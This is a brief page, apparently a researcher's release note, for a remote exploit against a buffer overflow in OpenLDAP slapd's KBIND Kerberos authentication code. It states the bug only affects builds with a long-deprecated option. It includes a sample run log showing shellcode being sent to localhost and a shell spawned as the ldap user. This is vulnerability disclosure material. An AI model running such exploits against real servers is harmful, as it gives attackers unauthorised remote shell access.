by Alexander Sotirov
OpenLDAP KBIND authentication buffer overflow exploit
This is a remote exploit for a buffer overflow in the Kerberos KBIND authentication code in the OpenLDAP slapd server. The vulnerable code is enabled only when OpenLDAP is compiled with the --enable-kbind option, which has been disabled by default since version 2.0.2 and was removed from the configure script in the 2.1 release. The chance of finding a real system that is still vulnerable is minimal.
Details about the vulnerability are available in the advisory.
$ ./openldap-kbind-p00f.exe 127.0.0.1 cn=Manager,dc=my-domain,dc=com : openldap-kbind-p00f.c - OpenLDAP kbind remote exploit : Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no] : by Solar Eclipse <email@example.com> Sending shellcode Reading bind result Spawning shell... uid=439(ldap) gid=439(ldap) groups=439(ldap) ldap@localhost / $